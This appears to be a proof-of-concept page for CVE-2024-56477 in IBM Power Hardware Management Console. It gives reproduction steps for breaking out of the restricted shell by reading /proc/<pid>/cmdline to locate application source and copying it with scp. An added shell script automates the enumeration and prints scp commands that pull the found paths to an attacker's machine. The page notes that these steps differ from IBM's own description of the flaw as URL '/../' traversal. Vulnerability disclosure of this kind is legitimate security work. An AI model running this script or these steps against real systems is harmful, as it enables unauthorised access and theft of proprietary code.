
CVE-2024-56477 PoC — IBM Power Hardware Management Console directory traversal

Source
Associated Vulnerability
Title: IBM Power Hardware Management Console directory traversal (CVE-2024-56477)
Description: IBM Power Hardware Management Console V10.3.1050.0 could allow an authenticated user to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.
Readme
# CVE-2024-56477: Able to traverse through directories from a restricted environment and access Power Hardware Management Console (HMC) source code

## Description

An authenticated, low-privileged user confined to the HMC's restricted shell can identify where the application's source code lives by reading the command line of an already running process, and can then copy that location in full with scp. The issue arises because the authorization controls applied to the low-privileged account are insufficient, which provides a way to bypass the restricted bash environment. Note that IBM's advisory text describes the issue as a URL request containing "dot dot" (/../) sequences, whereas the steps below rely on process information readable from the restricted shell and on scp.

- **Vulnerability Type**: Directory Traversal
- **Severity**: Medium (CVSS: 6.5)
- **Impact**: Restricted Bash Breakout

### Summary

After escaping the restricted shell, an attacker can read sensitive data and files that were previously inaccessible, in this case the HMC source code.
If an attacker breaks out of the restricted bash environment, they may also gain access to a broader set of system privileges, potentially escalating from a low-privileged user to a higher one.

---

## Affected Versions

The following versions of the Power Hardware Management Console are affected:

- Power Hardware Management Console (HMC) V10.3.1050.0
- Linux platform

---

## Reproduction Steps

To reproduce this vulnerability, follow the steps below:

1. Log in to the restricted bash environment and navigate to the directory where process-related information is stored (`/proc` on Linux).
2. Each process running on the system has a directory named after its process ID, and each of those directories contains a `cmdline` file.
3. Read the `cmdline` file of each process ID; one of them reveals the location of the source code.
   <img width="1712" alt="01" src="https://github.com/user-attachments/assets/ad3b2449-f854-4b6b-97b8-87d4297f1d4b" />
4. Use the scp command to download the source code from the identified path.
   <img width="1712" alt="02" src="https://github.com/user-attachments/assets/d2b59f32-6be1-4bb5-a6a5-ab51fa85603b" />
   <img width="1683" alt="03" src="https://github.com/user-attachments/assets/d0d2f2d9-9b05-410e-bb5d-05539440a78c" />
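The following script automates steps 1 to 4 above: it decodes every readable `/proc/<pid>/cmdline`, pulls out the absolute paths those command lines reference, and prints the scp command that would fetch each one. It is an added example written for this page, not code from the original README or from IBM. The runtime keywords used to filter the process list, the `HMC_USER`/`HMC_HOST` placeholders and the sample command line used to exercise the helpers are assumptions; the real path the PoC author found is only shown in the screenshots and is not reproduced here.

```shell
#!/bin/sh
# Added example (not from the original README): locate the path of running
# application code by reading /proc/<pid>/cmdline, which is what the
# reproduction steps do by hand, then print the scp command that fetches it.
# Filter keywords, HMC_USER/HMC_HOST placeholders and any sample command
# lines are constructed assumptions, not values taken from the advisory.

# /proc/<pid>/cmdline stores argv as NUL-separated strings; render it on one line.
decode_cmdline() {
    tr '\0' ' ' | sed 's/ *$//'
}

# Print every absolute path found in a decoded command line, one per line.
# Arguments of the form -Dname=/path or --opt=/path are unwrapped first.
extract_paths() {
    tr ' ' '\n' | sed 's/^-[^=]*=//' | grep '^/' | sort -u
}

# Walk /proc and print "pid<TAB>cmdline" for every process whose cmdline is readable.
list_cmdlines() {
    for d in /proc/[0-9]*; do
        [ -r "$d/cmdline" ] || continue
        cmd=$(decode_cmdline < "$d/cmdline")
        [ -n "$cmd" ] && printf '%s\t%s\n' "${d#/proc/}" "$cmd"
    done
}

# Paths referenced by processes that look like an application runtime.
# The keyword list is an assumption about what an HMC process table contains.
find_code_paths() {
    list_cmdlines | grep -iE 'java|python|perl|node|/opt/|/usr/local' | cut -f2- | extract_paths
}

# Build the scp command run from the attacker's machine in step 4.
# User and host are placeholders; $1 is a path revealed by find_code_paths.
scp_command() {
    printf 'scp -r %s@%s:%s ./hmc-src\n' \
        "${HMC_USER:-hmcuser}" "${HMC_HOST:-hmc.example.internal}" "$1"
}

# Usage on the target: sh find_hmc_code.sh scan
if [ "${1:-}" = "scan" ]; then
    find_code_paths | while IFS= read -r p; do scp_command "$p"; done
fi
```

Run it with `scan` from the restricted shell to list candidate source locations; everything else only defines functions, so the helpers can be sourced and reused. On a hardened system the same enumeration is a quick check: if `/proc/<pid>/cmdline` of the application processes is readable to the restricted account, the source location is exposed regardless of what the shell itself forbids.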
